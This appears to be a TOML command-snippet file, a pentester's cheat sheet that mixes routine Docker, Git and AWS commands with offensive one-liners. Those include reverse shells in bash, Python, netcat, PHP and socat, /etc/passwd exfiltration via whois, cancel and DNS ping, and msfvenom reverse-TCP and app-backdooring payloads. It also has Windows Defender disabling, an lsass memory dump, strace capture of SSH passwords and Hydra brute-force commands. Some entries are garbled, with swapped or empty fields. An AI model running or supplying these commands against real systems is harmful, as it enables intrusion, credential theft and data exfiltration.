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[[snippets]] | |
description = "Python PTY Bash" | |
command = "python -c 'import pty; pty.spawn(\"/bin/bash\")'" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Reverse Shell] Socat Reverse Shell" | |
command = "socat file:`tty`,raw,echo=0 tcp-listen:<PORT=4444> #Listener socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<HOST>:<PORT=4444> #Victim" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Reverse Shell] Bash Reverse Shell" | |
command = "bash -i >& /dev/tcp/<HOST>/<PORT=2121> 0>&1" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Reverse Shell] Python Reverse Shell" | |
command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<HOST>\",<PORT=2121>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/sh\",\"-i\"]);'" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Reverse Shell] Netcat Without -e Reverse Shell" | |
command = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <HOST> <PORT=2121> >/tmp/f" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Reverse Shell] PHP Reverse Shell" | |
command = "php -r '$sock=fsockopen(\"<HOST>\",<PORT=2121>);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Misc] Increase Virtual Memory Size" | |
command = "sysctl -w vm.max_map_count=262144" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Wget] Wget Recursive Download" | |
command = "wget -r -e robots=off" | |
output = "\"\"" | |
[[snippets]] | |
description = "[GIT] Git hard reset .git to source codes have been rebuilt in the directory" | |
command = "git reset --hard" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Misc] Generate favicon hash" | |
command = "python3 -c \"import mmh3,sys;import requests;import codecs;response = requests.get(sys.argv[1]);favicon = codecs.encode(response.content,'base64');hash = mmh3.hash(favicon);print(hash)\"" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Recon] Gau -subs" | |
command = "echo DOMAIN | gau -subs | grep -vE \"(\\.png|\\.jpg|\\.svg|\\.woff|\\.tff)\" | sort -u" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Recon] go-dork chained with nuclei" | |
command = "go-dork -q \"inurl:'/secure' intext:'jira' site:org\" -s | nuclei -t workflows/jira-workflow.yaml" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Dev] Gunicorn servce django project" | |
command = "gunicorn {{project_name}}.wsgi:application --bind --log-level=info --log-file=- --workers 2 --user=rhama" | |
output = "\"\"" | |
[[snippets]] | |
description = "[GIT] List all cloned git directories on system" | |
command = "find / -name \".git\" -execdir git remote get-url origin \\; 2>/dev/null" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Docker] Delete all running and stopped containers" | |
command = "docker container rm -f $(docker ps -aq)" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Docker] Print the last 100 lines of a container’s logs" | |
command = "docker container logs --tail 100 {{container_name}}" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Docker] Remove all images" | |
command = "docker rmi -f $(docker images -a -q)" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Docker] Remove all unused data including: image, network, stop container" | |
command = "docker system prune" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Docker] Remove all untagged images" | |
command = "docker rmi $(docker images --filter \"dangling=true\" -q --no-trunc) --force" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Docker] Stop all running containers" | |
command = "docker stop $(docker ps -aq)" | |
output = "\"\"" | |
[[snippets]] | |
description = "[OS] Set Multi-user Systemd Boot Target" | |
command = "sudo systemctl set-default" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Nmap] nmap verbose scan" | |
command = "nmap -v -sS -A -T4 <HOST>" | |
output = "\"\"" | |
[[snippets]] | |
description = "[Find] Delete all .pyc files" | |
command = "find . -type f -name \"*.pyc\" | xargs rm -rf" | |
output = "\"\"" | |
[[snippets]] | |
description = "[GIT] Undo git add before commit in specific filename" | |
command = "git reset filename" | |
output = "" | |
[[snippets]] | |
description = "[GIT] Unstage all changes" | |
command = "git reset" | |
output = "" | |
[[snippets]] | |
description = "XSSHunter Payload" | |
command = "\"><script src=></script>" | |
output = "" | |
[[snippets]] | |
description = "[Socat] CTF Socket Listen" | |
command = "socat -d -d -d TCP4-LISTEN:60004,reuseaddr,fork EXEC:\"/usr/bin/python\" > /dev/null 2>&1 &" | |
output = "" | |
[[snippets]] | |
description = "[Find] SUID Binary" | |
command = "find /* -user root -perm -4000 -print 2>/dev/null" | |
output = "" | |
[[snippets]] | |
description = "[Nmap] Simple Port Knocking" | |
command = "for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x <HOST>; done" | |
output = "" | |
[[snippets]] | |
description = "[Hydra] Brute force ssh with wordlist" | |
command = "hydra -L <user-list.txt> -P <password-list.txt> ssh://<HOST>" | |
output = "" | |
[[snippets]] | |
description = "[Hydra] Brute force ftp" | |
command = "hydra -V -l admin -P passwords.txt -e ns -f -s 21 <HOST> ftp" | |
output = "" | |
[[snippets]] | |
description = "[Android] Jarsigner build APK" | |
command = "jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 -keystore ~/.android/debug.keystore -storepass android <APK_NAME> androiddebugkey" | |
output = "" | |
[[snippets]] | |
description = "[Android] Zipalign APK" | |
command = "zipalign -v 4 <APK_NAME> <NEW_APK_NAME>" | |
output = "" | |
[[snippets]] | |
description = "[Frida] Hook Android Apps" | |
command = "frida -U -l <SCRIPT_NAME=crypto_hook.js> -p $(adb shell ps | grep -i <PACKAGE=com.finshell.fintech> | awk '{print $2}')" | |
output = "" | |
[[snippets]] | |
description = "[Reccon] Collecting urls + test ssrf" | |
command = "gau | urlive | grep -E '(callback=|jsonp=|api_key=|api=|password=|email=|emailto=|token=|username=|csrf_token=|unsubscribe_token=|p=|q=|query=|search=|id=|item=|page_id=|secret=|url=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_urllogin_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file=|cmd=|ip=|ping=|lang=|edit=|LoginId=|size=|signature=|passinfo=)' | qsreplace EnterYourBurpCollabrator | concurl" | |
output = "" | |
[[snippets]] | |
description = "[Mac] Enable ZSH Completion" | |
command = "autoload -Uz compinit && compinit" | |
output = "" | |
[[snippets]] | |
description = "[Mac] Disable Char Popup while holding key" | |
command = "defaults write -g ApplePressAndHoldEnabled -bool false" | |
output = "" | |
[[snippets]] | |
description = "[Mac] Enable Char Popup while holding key" | |
command = "efaults write -g ApplePressAndHoldEnabled -bool true" | |
output = "" | |
[[snippets]] | |
description = "[Python] Simple FTP Server" | |
command = "python3 -m pyftpdlib -p 21" | |
output = "" | |
[[snippets]] | |
description = "[MSF] Backdooring Apps" | |
command = "msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_ip_address> LPORT=<your unused port> -x <legitimate app> -k -o <output name>" | |
output = "" | |
[[snippets]] | |
description = "[Nmap] Script Vuln Scanning" | |
command = "nmap -Pn -sV -sC --script vuln -T4 <HOST>" | |
output = "" | |
[[snippets]] | |
description = "[Nmap] Decoy scan -D with list of live host" | |
command = "nmap –D,,,ME -p 80,21,22,25,443 -Pn <HOST>" | |
output = "" | |
[[snippets]] | |
description = "[Socat] Bind port to executable" | |
command = "socat TCP-LISTEN:5000,reuseaddr,fork EXEC:\"python3\"" | |
output = "" | |
[[snippets]] | |
description = "[Android] Disable verify adb install" | |
command = "adb shell settings put global verifier_verify_adb_installs 0" | |
output = "" | |
[[snippets]] | |
description = "[Android] Disable package verify" | |
command = "adb shell settings put global package_verifier_enable 0" | |
output = "" | |
[[snippets]] | |
description = "[Nmap-SMB] SMB Enumeration" | |
command = "nmap –script=smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse" | |
output = "" | |
[[snippets]] | |
description = "[Nmap-Mysql] Mysql Enumeration" | |
command = "nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <HOST> -p 3306" | |
output = "" | |
[[snippets]] | |
description = "[Nmap-SMTP] SMTP Enumeration" | |
command = "nmap –script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 <HOST>" | |
output = "" | |
[[snippets]] | |
description = "[Recon-SNMP] SNMP Enumeration" | |
command = "snmpwalk -c public -v1 <HOST>" | |
output = "" | |
[[snippets]] | |
description = "[Nmap-FTP] FTP Enumeration:" | |
command = "nmap –script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 <HOST>" | |
output = "" | |
[[snippets]] | |
description = "[Hydra] Brute Force HTTP Form" | |
command = "hydra <HOST> http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin" | |
output = "" | |
[[snippets]] | |
description = "[Tunneling] Tunneling throught" | |
command = "sshuttle -r [email protected]" | |
output = "" | |
[[snippets]] | |
description = "[Hashcat] Cracking md5" | |
command = "hashcat -m 500 -a 0 -o output.txt –remove hashes.txt /usr/share/wordlists/rockyou.txt" | |
output = "" | |
[[snippets]] | |
description = "[Nmap] General Enumeration (Verbose)" | |
command = "nmap -vv -Pn -A -sC -sS -T 4 -p- <HOST>" | |
output = "" | |
[[snippets]] | |
description = "[Openssl] Show expiration date of SSL certificate" | |
command = "echo | openssl s_client -connect <HOST>:443 2>/dev/null |openssl x509 -dates -noout" | |
output = "" | |
[[snippets]] | |
description = "[Recon-SMB] SMB Enumeration using enum4linux" | |
command = "enum4linux <HOST>" | |
output = "" | |
[[snippets]] | |
description = "[Aws] Get AWS Lambda Function" | |
command = "aws lambda get-function --function-name <FUNCTION=VulnerableFunction> --profile <PROFILE=LambdaReadOnlyTester> --region <REGION=us-east-2>" | |
output = "" | |
[[snippets]] | |
description = "[AWS] get list event that triggered <FUNCTION>" | |
command = "aws lambda list-event-source-mappings --function-name <FUNCTION=VulnerableFunction> --profile <PROFILE=LambdaReadOnlyTester>" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Get lambda function policy" | |
command = "aws lambda get-policy --function-name <FUNCTION=VulnerableFunction> --profile <PROFILE=LambdaReadOnlyTester>" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Perform Whoami to access key" | |
command = "aws sts get-caller-identity --profile <PROFILE>" | |
output = "" | |
[[snippets]] | |
description = "[Exfiltrate] Exfiltrate using cancel" | |
command = "cancel -u \"$(cat /etc/passwd)\" -h <<PORT=2121>" | |
output = "" | |
[[snippets]] | |
description = "[Exfiltrate] Exfiltrate whois" | |
command = "whois -h <> -p <PORT=2121> `cat /etc/passwd`" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Get Policy Version Detail" | |
command = "aws iam get-policy-version --policy-arn <ARN=arn:aws:iam::838475217688:policy/LambdaReadOnlyTester> --version-id v1" | |
output = "" | |
[[snippets]] | |
description = "[Wget] Clone HTML Template" | |
command = "wget --recursive --no-clobber --page-requisites --html-extension --convert-links --restrict-file-names=windows --domains --no-parent <WEBSITE>" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Set IAM default policy version" | |
command = "aws iam set-default-policy-version --version-id v5 --policy-arn arn:aws:iam::838475217688:policy/cg-raynor-policy-cgidg7msogmyzq --profile raynor" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Get Attached Policies on specific username" | |
command = "aws iam list-attached-user-policies --user-name <USERNAME> --profile raynor" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Get User Information" | |
command = "aws iam get-user" | |
output = "" | |
[[snippets]] | |
description = "[Python] Simple FTP Server using pyftpdlib" | |
command = "python -m pyftpdlib -p 21 -w" | |
output = "" | |
[[snippets]] | |
description = "[Python] Simple HTTP Server using SimpleHTTPServer" | |
command = "python -m SimpleHTTPServer 80" | |
output = "" | |
[[snippets]] | |
description = "[AWS-Lambda] Get Lambda Function List" | |
command = "aws lambda list-functions --profile <PROFILE>" | |
output = "" | |
[[snippets]] | |
description = "[AWS-Lambda] Get Policy Of Function" | |
command = "aws lambda get-policy --function-name <FUNCTION>" | |
output = "" | |
[[snippets]] | |
description = "[GIT] Find the commit id of the commit that deleted your file" | |
command = "git log --diff-filter=D --summary" | |
output = "" | |
[[snippets]] | |
description = "[GIT] Restore Specific File from Commit" | |
command = "git checkout <COMMIT-HASH=81eeccf>~1 <your-lost-file-name>" | |
output = "" | |
[[snippets]] | |
description = "[GIT] Apply Specific File On Stash" | |
command = "git checkout stash@{<INDEX=0>} -- <filename>" | |
output = "" | |
[[snippets]] | |
description = "[Reccon] Scanning IP On The Network" | |
command = "netdiscover -i <INTERFACE=eth0>" | |
output = "" | |
[[snippets]] | |
description = "[GIT] Diff stash specific file" | |
command = "git diff stash@{0}^1 stash@{0} -- project/secure_code_platform/templates/core/exercise.html" | |
output = "" | |
[[snippets]] | |
description = "[Python] Pretty print json" | |
command = "python3 -m json.tool <JSON_FILE=exercises.json>" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Get assume role of specific service" | |
command = "aws --profile test2 iam list-roles | jq -r '.Roles[] | select( .AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service' | grep -B 1 \"\" | grep -v \"\" |sort -u | uniq" | |
output = "" | |
[[snippets]] | |
description = "for i in $(cat /etc/passwd | fold -w 100 | xxd -ps); do ping $i.<>;done" | |
command = "[Exfiltrate] DNS Exfiltrate Via Ping" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Show UserData of EC2 Instance" | |
command = "aws ec2 describe-instance-attribute --attribute userData --instance-id i-0a0fd26b0e9fdd85b --profile student --region eu-west-2" | |
output = "" | |
[[snippets]] | |
description = "[CLI] Rot 13 Decode" | |
command = "echo \"AAA\" | tr 'A-Za-z' 'N-ZA-Mn-za-m'" | |
output = "" | |
[[snippets]] | |
description = "[ImageMagick] Compress Jpeg File" | |
command = "convert -strip -interlace Plane -gaussian-blur 0.05 -quality 85% <SRC=source.jpg> <DST=dst.jpg>" | |
output = "" | |
[[snippets]] | |
description = "[Powershell] Disable Windows Defender" | |
command = "Set-MpPreference -DisableRealtimeMonitoring $true" | |
output = "" | |
[[snippets]] | |
description = "[Windows-Wmic] Installed Security Patch List on machine" | |
command = "wmic qfe list" | |
output = "" | |
[[snippets]] | |
description = "[Windows-Wmic] Get Single Process PID" | |
command = "wmic process where \"name='<PROC_NAME=lsass.exe>'\" get processid" | |
output = "" | |
[[snippets]] | |
description = "[SSH] Forwarding local port to remote host" | |
command = "ssh -N -v -R <REMOTE_PORT>:<LOCAL_IP>:<LOCAL_PORT> [email protected]" | |
output = "" | |
[[snippets]] | |
description = "[Iptables] Allow only specific IP to DST Port" | |
command = "/sbin/iptables -A INPUT -p tcp ! -s <ALLOWED_IP=> --dport <DST_PORT=8083> -j DROP" | |
output = "" | |
[[snippets]] | |
description = "[Iptables] DROP Incoming connection to DST_PORT" | |
command = "/sbin/iptables -A INPUT -p tcp --destination-port <DST_PORT=8080> -j DROP" | |
output = "" | |
[[snippets]] | |
description = "[Mac] Netstat linux like alternative" | |
command = "sudo lsof -i -n -P" | |
output = "" | |
[[snippets]] | |
description = "[Openssl] Use aes-128-cbc algorithm to encrypt files" | |
command = "openssl enc -e -aes-128-cbc -in abc.txt -out enc_abc.txt" | |
output = "" | |
[[snippets]] | |
description = "[Openssl] Use the aes-128-cbc algorithm to decrypt the file" | |
command = "openssl enc -d -aes-128-cbc -in enc_abc.txt -out abc.txt" | |
output = "" | |
[[snippets]] | |
description = "[Openssl] Use the aes-128-cbc algorithm to encrypt files without interactive input password" | |
command = "openssl enc -e -aes-128-cbc -in abc.txt -out enc_abc.txt -pass pass:123456" | |
output = "" | |
[[snippets]] | |
description = "[Openssl] Use encryption algorithm aes-256-cbc and password file to encrypt large files" | |
command = "openssl enc -aes-256-cbc -salt -in largefile.pdf -out largefile.pdf.enc" | |
output = "" | |
[[snippets]] | |
description = "[Mac] Monitoring File System Event" | |
command = "fs_usage -w -filesystem" | |
output = "" | |
[[snippets]] | |
description = "[Tshark] Logging DNS Query Name" | |
command = "tshark -Y \"udp.dstport==53\" -T fields -e \"\"" | |
output = "" | |
[[snippets]] | |
description = "[Docker] Inspect network on running container" | |
command = "docker inspect <CONTAINER=my-ubuntu> -f \"{{json .NetworkSettings.Networks }}\" | jq" | |
output = "" | |
[[snippets]] | |
description = "[MSF] Execute Windows Command - generate dll named shell32.dll that will pop calc when ran" | |
command = "msfvenom -f dll -p windows/exec CMD=\"C:\\windows\\system32\\calc.exe\" -o shell32.dll" | |
output = "" | |
[[snippets]] | |
description = "[MSF] Windows DLL with Windows cmd" | |
command = "msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll > shell-cmd.dll" | |
output = "" | |
[[snippets]] | |
description = "[MSF] Executable with Windows cmd" | |
command = "msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-cmd.exe" | |
output = "" | |
[[snippets]] | |
description = "[MSF] Executable with Meterpreter" | |
command = "msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-meterp.exe" | |
output = "" | |
[[snippets]] | |
description = "[MSF] Generate raw win 64 exec CMD" | |
command = "msfvenom -p windows/x64/exec CMD=<CMD=calc.exe> -f raw -o <NAME=shellcode.bin> -a x64" | |
output = "" | |
[[snippets]] | |
description = "[Windows] Dump process using a native comsvcs.dll" | |
command = "rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump <PID=624> <OUTPUT=C:\\temp\\lsass.dmp> full" | |
output = "" | |
[[snippets]] | |
description = "[Windows] Encode file using certutil format" | |
command = "certutil -encode <IN_FILE=shellcode.bin> <OUT_FILE=shellcode.encode>" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Attach Instance Profile to EC2 Instance" | |
command = "aws ec2 associate-iam-instance-profile --iam-instance-profile Name=S3ReadOnlyAccess-Role --instance i-0fe5acf4cdf179193 --profile bt --region us-east-2" | |
output = "" | |
[[snippets]] | |
description = "[SSRF] Cloud Metadata" | |
command = "" | |
output = "" | |
[[snippets]] | |
description = "[AWS] get inline role policy" | |
command = "aws iam get-role-policy --role-name <ROLE_NAME=Test-Role> --policy-name <POLICY_NAME=ExamplePolicy>" | |
output = "" | |
[[snippets]] | |
description = "[AWS] get role details" | |
command = "aws iam get-role --role-name <ROLE_NAME=Test-Role>" | |
output = "" | |
[[snippets]] | |
description = "[AWS] get managed policy list for specific role" | |
command = "aws iam list-attached-role-policies --role-name <ROLE_NAME=AWSServiceRoleForSupport>" | |
output = "" | |
[[snippets]] | |
description = "[AWS] get inline policies for specific role" | |
command = "aws iam list-role-policies --role-name <ROLE_NAME=Test-Role>" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Get all instances status" | |
command = "aws ec2 describe-instances --query 'Reservations[*].Instances[*].[Placement.AvailabilityZone, State.Name, InstanceId]' --output text" | |
output = "" | |
[[snippets]] | |
description = "[AWS] VPC CidrBlock list" | |
command = "aws ec2 describe-vpcs --region us-east-2 --output table --query \"Vpcs[*].[CidrBlock,IsDefault,VpcId]\"" | |
output = "" | |
[[snippets]] | |
description = "[AWS] EC2 List summary" | |
command = "aws ec2 describe-instances --query 'Reservations[*].Instances[*].[Placement.AvailabilityZone, State.Name, InstanceId, VpcId, NetworkInterfaces[*].Groups, PrivateIpAddress,PrivateDnsName, PublicIpAddress, PublicDnsName]' --region us-east-2 --output yaml" | |
output = "" | |
[[snippets]] | |
description = "[Recon] Collect All repository name github" | |
command = "for i in {1..9}; do curl -k \"<TARGET=kitabisa>?page=$i\" | grep '/<TARGET=kitabisa>' | grep mr-3 | awk '{print $2}' 2>/dev/null >> tmp; done && cat tmp | cut -d \"/\" -f 3 | sort -u > github-repo.txt" | |
output = "" | |
[[snippets]] | |
description = "[Payload] Java Runtime.exec sh command execute" | |
command = "sh -c $@|sh . echo ls -la / | nc <> 2121" | |
output = "" | |
[[snippets]] | |
description = "[OS] Set time to use NTP" | |
command = "$ sudo apt install ntpdate $ sudo ntpdate -s $ sudo dpkg-reconfigure tzdata" | |
output = "" | |
[[snippets]] | |
description = "[Windows] Start Applocker service" | |
command = "sc config \"AppIDSvc\" start=auto & net start \"AppIDSvc\"" | |
output = "" | |
[[snippets]] | |
description = "[Nmap] Scanning large network using nmap : Scanning 676,352 IP Addresses in 46 Hours" | |
command = "" | |
output = "" | |
[[snippets]] | |
description = "Upgrading Simple Shells to Fully Interactive TTYs" | |
command = "" | |
output = "" | |
[[snippets]] | |
description = "Kernel Module Reverse Shell" | |
command = "" | |
output = "" | |
[[snippets]] | |
description = "[AWS] View NACL on Specific Subnet" | |
command = "aws ec2 describe-network-acls --filter \"Name=association.subnet-id,Values=<SUBNET_ID=subnet-1ae9df57>\" --query NetworkAcls[].Entries --output table --color off" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Summary of RDS instance" | |
command = "aws rds describe-db-instances --filter --query DBInstances[].[DBInstanceIdentifier,MasterUsername,DBSubn etGroup.VpcId,Endpoint.Address] --output=table --color off" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Find VPC id by CIDR block" | |
command = "aws ec2 describe-vpcs --filter \"Name=cidrBlock,Values=<CIDR=>\" --query Vpcs[].VpcId --output table --color off" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Find all open outbond Security Groups" | |
command = "aws ec2 describe-security-groups --filter \"Name=egress.ip-permission.cidr,Values='',Name=vpc-id,Values=<VPC_ID=vpc-96c34cfe>\" --output table --color off --query SecurityGroups[].GroupId" | |
output = "" | |
[[snippets]] | |
description = "[LINUX] Stop systemd-resolved" | |
command = "sudo systemctl disable systemd-resolved" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Push public key to EC2 instance via EC2 connect" | |
command = "aws ec2-instance-connect send-ssh-public-key --instance-id <INSTANCE=i-0989ec3292613a4f9> --availability-zone <AVAILABILITY_ZONE=us-east-2b> --instance-os-user <USERNAME=ubuntu> --ssh-public-key file:// --region us-east-2" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Execute shell script on specific EC2 Instance via SSM" | |
command = "aws ssm send-command --document-name \"AWS-RunShellScript\" --document-version \"1\" --targets '[{\"Key\":\"InstanceIds\",\"Values\":[<INSTANCE_ID=\"i-049ce383acf05967d\">]}]' --parameters '{\"workingDirectory\":[\"\"],\"executionTimeout\":[\"3600\"],\"commands\":[\"echo \\\"Hello\\\" > /tmp/ssm_hello.txt\"]}' --timeout-seconds 600 --max-concurrency \"50\" --max-errors \"0\" --region us-east-2" | |
output = "" | |
[[snippets]] | |
description = "[Cheatsheet] SSRF Cheatsheet" | |
command = "" | |
output = "" | |
[[snippets]] | |
description = "[AWS] SSM Command result" | |
command = "aws ssm list-command-invocations --command-id <COMMAND_ID=ea37f13d-e4ef-48e4-87a0-0dc14d921266>" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Get EC2 Instance ID" | |
command = "aws ec2 describe-instances --region us-east-1 --output table --query 'Reservations[*].Instances[*].InstanceId'" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Create IAM role AssumeRole Policy" | |
command = "aws iam create-role --role-name <ROLE_NAME=EC2-Admin-Role> --assume-role-policy-document file://ec2-role-trust-policy.json" | |
output = "" | |
[[snippets]] | |
description = "[Reverse Shell] Bash reverse shell, please check existence of /dev/pts/X first" | |
command = "telnet 2121 0<<DEV_NAME_1=/dev/pts/0> | /bin/bash &><DEV_NAME_2=/dev/pts/2>" | |
output = "" | |
[[snippets]] | |
description = "[SSH] SSH Remote Port Forwarding" | |
command = "ssh -R <LOCAL_PORT=2121>:localhost:<SERVER_PORT=2121> do -v -N" | |
output = "" | |
[[snippets]] | |
description = "[Socat] Forward TCP Traffic to TARGET_SERVER" | |
command = "socat TCP4-LISTEN:2121,fork TCP4:<TARGET_SERVER=>" | |
output = "" | |
[[snippets]] | |
description = "[Misc] Backdooring stdin command using strace" | |
command = "alias <COMMAND=ssh>='strace -f -e trace=read,write -o /tmp/.ssh.log -s 32 ssh'" | |
output = "" | |
[[snippets]] | |
description = "[Misc] Record the plaintext password of the sshd process" | |
command = "sudo strace -f -F -p `ps aux|grep \"sshd -D\"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2>/tmp/sshd_log" | |
output = "" | |
[[snippets]] | |
description = "[Socat] Socat Cheatsheet" | |
command = "" | |
output = "" | |
[[snippets]] | |
description = "[Socat] Debugging Unix Socket by forwarding" | |
command = "socat -v UNIX-LISTEN:/tmp/socat-listen UNIX-CONNECT:/path/to/real.socket" | |
output = "" | |
[[snippets]] | |
description = "[Socat] Listen to Port #nc alternative" | |
command = "socat TCP-LISTEN:<PORT=2121>,reuseaddr,pf=ip4,fork -" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Log all stdout to file and send it to syslog" | |
command = "exec > >(tee /tmp/user-data.log|logger -t <TYPE=user-data> -s 2>/dev/console) 2>&1" | |
output = "" | |
[[snippets]] | |
description = "[Openssl] generate linux password" | |
command = "openssl passwd -1 password" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Find File containing password" | |
command = "find / -maxdepth 4 -name '*.conf' -type f -exec grep -Hn 'pass\\|password\\|login\\|username\\|email\\|mail\\|host\\|ip' {} \\; 2>/dev/null" | |
output = "" | |
[[snippets]] | |
description = "nmap -sV -p 111 --script=rpcinfo $RHOST" | |
command = "[Nmap-NFS] Enumerate RPC NFS using nmap" | |
output = "" | |
[[snippets]] | |
description = "[GDB] Python script for side channel attack using gdb" | |
command = "" | |
output = "" | |
[[snippets]] | |
description = "[Misc] Generate httpasswd password" | |
command = "echo \"admin:`openssl passwd -apr1 YourPassword`\" | sudo tee -a /etc/nginx/htpasswd.kibana" | |
output = "" | |
[[snippets]] | |
description = "[AWS] List all private AMI's, ImageId and Name tags" | |
command = "aws ec2 describe-images --filter \"Name=is-public,Values=false\" --query 'Images[].[ImageId, Name]' --output text | sort -k2" | |
output = "" | |
[[snippets]] | |
description = "[GIT] Checkout specifik file di commit ID" | |
command = "git checkout [commit ID] -- path/to/file" | |
output = "" | |
[[snippets]] | |
description = "[Wget] Download files recursively" | |
command = "wget -nd -np -P . -r -R \"index.html*\"" | |
output = "" | |
[[snippets]] | |
description = "[Wget] Download files and directories recursively" | |
command = "wget $ wget -np -P . -r -R \"index.html*\" --cut-dirs=4" | |
output = "" | |
[[snippets]] | |
description = "[SED] remove empty lines" | |
command = "sed '/^$/d'" | |
output = "" | |
[[snippets]] | |
description = "[Misc] Split text file every n line nth line" | |
command = "for f in filename*.txt; do split -d -a1 -l10000 --additional-suffix=.txt \"$f\" \"${f%.txt}-\"; done" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Remount root partition ro RW" | |
command = "mount -o remount,rw /" | |
output = "" | |
[[snippets]] | |
description = "[Linux-Misc] Load env variable from file" | |
command = "export $(cat creds/.inder.cred | xargs)" | |
output = "" | |
[[snippets]] | |
description = "Disabling the GUI/X/Head" | |
command = "systemctl set-default" | |
output = "" | |
[[snippets]] | |
description = "Enable the GUI/X/Head" | |
command = "systemctl set-default" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Create dummy file with size bs*count" | |
command = "dd if=/dev/zero of=/tmp/dummy.img bs=1024 count=120000" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Get Public Exposed Outbound SG on VPC" | |
command = "aws ec2 describe-security-groups --filter \"Name=egress.ip- permission.cidr,Values='',Name=vpc-id,Values=<VPC_ID=vpc-96c34cfe>\" --output table --color off --query SecurityGroups[].GroupId" | |
output = "" | |
[[snippets]] | |
description = "[Misc] Add Prefix string in file" | |
command = "sed -e 's/^/<prefix=PREFFIX>/g' <nama_file=subdomain.txt>" | |
output = "" | |
[[snippets]] | |
description = "Find All Allocated IP ranges for ASN given an IP address" | |
command = "whois -h -i origin -T route $(whois -h <Organization> | grep origin: | awk '{print $NF}' | head -1) | grep -w \"route:\" | awk '{print $NF}' | sort -n" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Android set proxy" | |
command = "adb shell settings put global http_proxy <ip address>:<param>" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Android unset proxy" | |
command = "adb shell settings put global http_proxy :0" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Brute forcing for endpoints with dirsearch" | |
command = "dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u <URL>" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "certprobe / runs httprobe on all the hosts from certspotter" | |
command = "curl -s\\?q\\=\\%.<domain>\\&output\\=json | jq -r '.[].name_value' | sed 's/\\*\\.//g' | sort -u | httprobe | tee -a ./all.txt" | |
tag = ["hackpet"] | |
output = "" | |
